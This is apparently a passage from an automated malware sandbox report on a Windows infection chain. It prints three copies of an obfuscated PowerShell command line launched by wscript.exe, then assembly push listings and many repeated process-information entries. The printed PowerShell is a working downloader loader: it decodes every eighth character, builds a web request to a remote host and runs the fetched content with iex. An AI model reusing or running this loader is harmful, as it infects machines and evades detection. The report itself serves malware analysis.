kr9unperv.cAfisnin2Regiona8theodraeAngolan4S hoolb1 Thelyt. 
StavnsrTeleotr2T pefli.drmmebid ConspieMicrotovTopchef/UdlistnnTaagetmePennyspdDr gbolkRiddersoTrvlerng KrgendeRecan.e. betacim Kruspes DeadmeoHusass ';$Overrigidness=Spdbarnsplejerens 'Soapyre>Indsnus ';$Unark=Spdbarnsplejerens 'Terningi,vergeneSlank ixKaosets ';$Metaprescutum='Caddises';$Arkivskab='\Nationalsocialisternes.Ska';Optllingslister (Spdbarnsplejerens 'Uhjlpso$BepaidlgBetali lRea izaoDisser,bEspartoATyr fgtlKlderen:Cebid nm ogejome S ppreKPapembaa Oblig.NklinikliBankemaShaplontMo dsgnieFinlandRHenns.n= N.trog$ ego,seEPlasmasn.ultideVIllegit:Bu.kladApel,rgoPRakitispQuincyuD GuidebA antasiTThomisiAUnhands+wasabis$Racial,aN nsurgRUnmercekForsortiDolomitVAmn,monS Et,opikBulwarkAPungpebbBowkerb ');Optllingslister (Spdbarnsplejerens 'Excla,m$KronpriGOpvaskelStumbleO otulisB Forma,aSulfosrLDiscolo: NightiITendo.oNUnwiseqd Libra i BesselSpakhusetWindburi PneumoNE,rthwacAdaptivtAgranulNFlambeeESlingreSAnnot tsUdv elg= Orchit$UncapiteLinj,skKReflektsBleeralPEnta glAKannikkTBedstevRIagttagiSnotdumEnabofamrnostalgePara.phTAcrolog.Reak orSB listip pologeLRhipidoI esidenTDonnere(Hematoz$zenithwoRadi
          Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Lediggang Graadighedens Disciplineringer Bagermestrene Teutonisk Uptilt #>;$Spegeplserne='Nymaledes';<#Messiness Compromising Anaphalis Gennemarbejdelsen Fodervikkerne #>;$Laparotomize140=$host.'PrivateData';If ($Laparotomize140) {$Trikotagefabrikker++;}function Spdbarnsplejerens($Ledningernes){$Annelism=$Totlafholdenhed61+$Ledningernes.Length-$Trikotagefabrikker; for( $Omgik=7;$Omgik -lt $Annelism;$Omgik+=8){$Methodisers='Exuscitate';$Protaspis+=$Ledningernes[$Omgik];$Newsroom204='Dkfjers';}$Protaspis;}function Optllingslister($baulky){ & ($Unark) ($baulky);}$Steamboating=Spdbarnsplejerens 'MouthfuMDecollaoUarb,jdzRaabaaniUdf ldelundertilAntipreaNebra.k/Averrab5stedbrd.Faglrer0 Ful,vr Blottel(Porch dWB taliniAfgangsnRati,nedPopuliso Ove clwAllokatsBegnawn HjertebN Kal etTTempl r Materia1Haunche0Waylanr. instit0Gri tmi;Departe c araciW,uccubei.aftkjonandest 6Eardro 4 Increa; Delege Finansrx Uterom6 mysti 4Fgtmedd;a,reste barramurMacroptvKonvolu:Re ligh1 Graph 2Argenti1Delubru.Apace a0Bebutto)Lystbaa unquietG Spelmae TwelfhcAttak ekSkamrdmoQuantis/Persona2Hemidom0Noggkas1 Nonchr0,anebry0Jaszmal1Futu is0Ud lugt1 Arquat BararmFLikenesiQuizzysrIchthyoeLuncherfOzoniz.oRaastofx.hefmgl/Gra,bea1Aym sar2 Fje,ne1.ongrat.Andelss0No merc ';$Railcard=Spdbarnsplejerens 'syltdepuSoapfissdkningsESvartidRRidning- Er,rinA PainkigOverophE GustinN NegatiTForkerk ';$Ekspatrieret=Spdbarnsplejerens 'Bille thG,ilingtThrenodtBibliotpNonevilsSkydere:Evangel/ mpetu/ Fili,tp DatostuSpecialb Blomme-Tremour2pladshof Achi l7Nipsetsd Quater0 upersu7gagered1Vgtford5 Repr.f3,nakepreGreeneraHousefl1ev kost4 B.odsp0Moduler3Ansamle1Jengene8Sockhea4 leopardStengun6Bioscie2Tonikum2U,ifiab6Skammel6Litigatd Ind kr9unperv.cAfisnin2Regiona8theodraeAngolan4S hoolb1 Thelyt. 
StavnsrTeleotr2T pefli.drmmebid ConspieMicrotovTopchef/UdlistnnTaagetmePennyspdDr gbolkRiddersoTrvlerng KrgendeRecan.e. betacim Kruspes DeadmeoHusass ';$Overrigidness=Spdbarnsplejerens 'Soapyre>Indsnus ';$Unark=Spdbarnsplejerens 'Terningi,vergeneSlank ixKaosets ';$Metaprescutum='Caddises';$Arkivskab='\Nationalsocialisternes.Ska';Optllingslister (Spdbarnsplejerens 'Uhjlpso$BepaidlgBetali lRea izaoDisser,bEspartoATyr fgtlKlderen:Cebid nm ogejome S ppreKPapembaa Oblig.NklinikliBankemaShaplontMo dsgnieFinlandRHenns.n= N.trog$ ego,seEPlasmasn.ultideVIllegit:Bu.kladApel,rgoPRakitispQuincyuD GuidebA antasiTThomisiAUnhands+wasabis$Racial,aN nsurgRUnmercekForsortiDolomitVAmn,monS Et,opikBulwarkAPungpebbBowkerb ');Optllingslister (Spdbarnsplejerens 'Excla,m$KronpriGOpvaskelStumbleO otulisB Forma,aSulfosrLDiscolo: NightiITendo.oNUnwiseqd Libra i BesselSpakhusetWindburi PneumoNE,rthwacAdaptivtAgranulNFlambeeESlingreSAnnot tsUdv elg= Orchit$UncapiteLinj,skKReflektsBleeralPEnta glAKannikkTBedstevRIagttagiSnotdumEnabofamrnostalgePara.phTAcrolog.Reak orSB listip pologeLRhipidoI esidenTDonnere(Hematoz$zenithwoRadi
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Lediggang Graadighedens Disciplineringer Bagermestrene Teutonisk Uptilt #>;$Spegeplserne='Nymaledes';<#Messiness Compromising Anaphalis Gennemarbejdelsen Fodervikkerne #>;$Laparotomize140=$host.'PrivateData';If ($Laparotomize140) {$Trikotagefabrikker++;}function Spdbarnsplejerens($Ledningernes){$Annelism=$Totlafholdenhed61+$Ledningernes.Length-$Trikotagefabrikker; for( $Omgik=7;$Omgik -lt $Annelism;$Omgik+=8){$Methodisers='Exuscitate';$Protaspis+=$Ledningernes[$Omgik];$Newsroom204='Dkfjers';}$Protaspis;}function Optllingslister($baulky){ & ($Unark) ($baulky);}$Steamboating=Spdbarnsplejerens 'MouthfuMDecollaoUarb,jdzRaabaaniUdf ldelundertilAntipreaNebra.k/Averrab5stedbrd.Faglrer0 Ful,vr Blottel(Porch dWB taliniAfgangsnRati,nedPopuliso Ove clwAllokatsBegnawn HjertebN Kal etTTempl r Materia1Haunche0Waylanr. instit0Gri tmi;Departe c araciW,uccubei.aftkjonandest 6Eardro 4 Increa; Delege Finansrx Uterom6 mysti 4Fgtmedd;a,reste barramurMacroptvKonvolu:Re ligh1 Graph 2Argenti1Delubru.Apace a0Bebutto)Lystbaa unquietG Spelmae TwelfhcAttak ekSkamrdmoQuantis/Persona2Hemidom0Noggkas1 Nonchr0,anebry0Jaszmal1Futu is0Ud lugt1 Arquat BararmFLikenesiQuizzysrIchthyoeLuncherfOzoniz.oRaastofx.hefmgl/Gra,bea1Aym sar2 Fje,ne1.ongrat.Andelss0No merc ';$Railcard=Spdbarnsplejerens 'syltdepuSoapfissdkningsESvartidRRidning- Er,rinA PainkigOverophE GustinN NegatiTForkerk ';$Ekspatrieret=Spdbarnsplejerens 'Bille thG,ilingtThrenodtBibliotpNonevilsSkydere:Evangel/ mpetu/ Fili,tp DatostuSpecialb Blomme-Tremour2pladshof Achi l7Nipsetsd Quater0 upersu7gagered1Vgtford5 Repr.f3,nakepreGreeneraHousefl1ev kost4 B.odsp0Moduler3Ansamle1Jengene8Sockhea4 leopardStengun6Bioscie2Tonikum2U,ifiab6Skammel6Litigatd Ind kr9unperv.cAfisnin2Regiona8theodraeAngolan4S hoolb1 Thelyt. 
StavnsrTeleotr2T pefli.drmmebid ConspieMicrotovTopchef/UdlistnnTaagetmePennyspdDr gbolkRiddersoTrvlerng KrgendeRecan.e. betacim Kruspes DeadmeoHusass ';$Overrigidness=Spdbarnsplejerens 'Soapyre>Indsnus ';$Unark=Spdbarnsplejerens 'Terningi,vergeneSlank ixKaosets ';$Metaprescutum='Caddises';$Arkivskab='\Nationalsocialisternes.Ska';Optllingslister (Spdbarnsplejerens 'Uhjlpso$BepaidlgBetali lRea izaoDisser,bEspartoATyr fgtlKlderen:Cebid nm ogejome S ppreKPapembaa Oblig.NklinikliBankemaShaplontMo dsgnieFinlandRHenns.n= N.trog$ ego,seEPlasmasn.ultideVIllegit:Bu.kladApel,rgoPRakitispQuincyuD GuidebA antasiTThomisiAUnhands+wasabis$Racial,aN nsurgRUnmercekForsortiDolomitVAmn,monS Et,opikBulwarkAPungpebbBowkerb ');Optllingslister (Spdbarnsplejerens 'Excla,m$KronpriGOpvaskelStumbleO otulisB Forma,aSulfosrLDiscolo: NightiITendo.oNUnwiseqd Libra i BesselSpakhusetWindburi PneumoNE,rthwacAdaptivtAgranulNFlambeeESlingreSAnnot tsUdv elg= Orchit$UncapiteLinj,skKReflektsBleeralPEnta glAKannikkTBedstevRIagttagiSnotdumEnabofamrnostalgePara.phTAcrolog.Reak orSB listip pologeLRhipidoI esidenTDonnere(Hematoz$zenithwoRadi
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8A7CD8 push eax; ret 4_2_00007FFD9B8A7CE1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B97BCB9 push ecx; iretd 4_2_00007FFD9B97BCBC
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_08FC30C3 push es; ret 6_2_08FC30C4
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_08FC4AA8 push ebx; ret 6_2_08FC4ABB
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_08FC046B push cs; ret 6_2_08FC0491
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_08FC304D push edi; iretd 6_2_08FC304F
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_08FC393A push ecx; iretd 6_2_08FC393B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_02C84AA8 push ebx; ret 11_2_02C84ABB
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_02C830C3 push es; ret 11_2_02C830C4
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_02C8304D push edi; iretd 11_2_02C8304F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_02C8393A push ecx; iretd 11_2_02C8393B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_02C8046B push cs; ret 11_2_02C80491
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04E927FA pushad ; ret 13_2_04E927F9
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04E9225F pushad ; ret 13_2_04E927F9
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04E9283D push eax; iretd 13_2_04E92858
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EC09AD push ecx; mov dword ptr [esp], ecx 13_2_04EC09B6
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04E9B008 push es; iretd 13_2_04E9B009
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04E99939 push es; iretd 13_2_04E99940
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_02EBEAF6 push es; ret 13_2_02EBEB11
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_02EBEB00 push es; ret 13_2_02EBEB11
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_02EC0868 push FFFFFFB6h; retf 13_2_02EC086A
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_02ECB399 push edi; ret 13_2_02ECB35C
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_02ECB34D push edi; ret 13_2_02ECB35C
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_02ECB350 push edi; ret 13_2_02ECB35C
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_02EB7653 pushfd ; retf 13_2_02EB765C
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_02EB75DB pushfd ; retf 13_2_02EB765C
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_02ECBA59 push es; retf 13_2_02ECBA5D
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_02EC9A09 push edi; ret 13_2_02EC9A0F
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04D264F7 push eax; iretd 13_2_04D2650B
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04D255C5 pushad ; ret 13_2_04D255C6
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04D2265E push edi; retf 13_2_04D22666
          Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
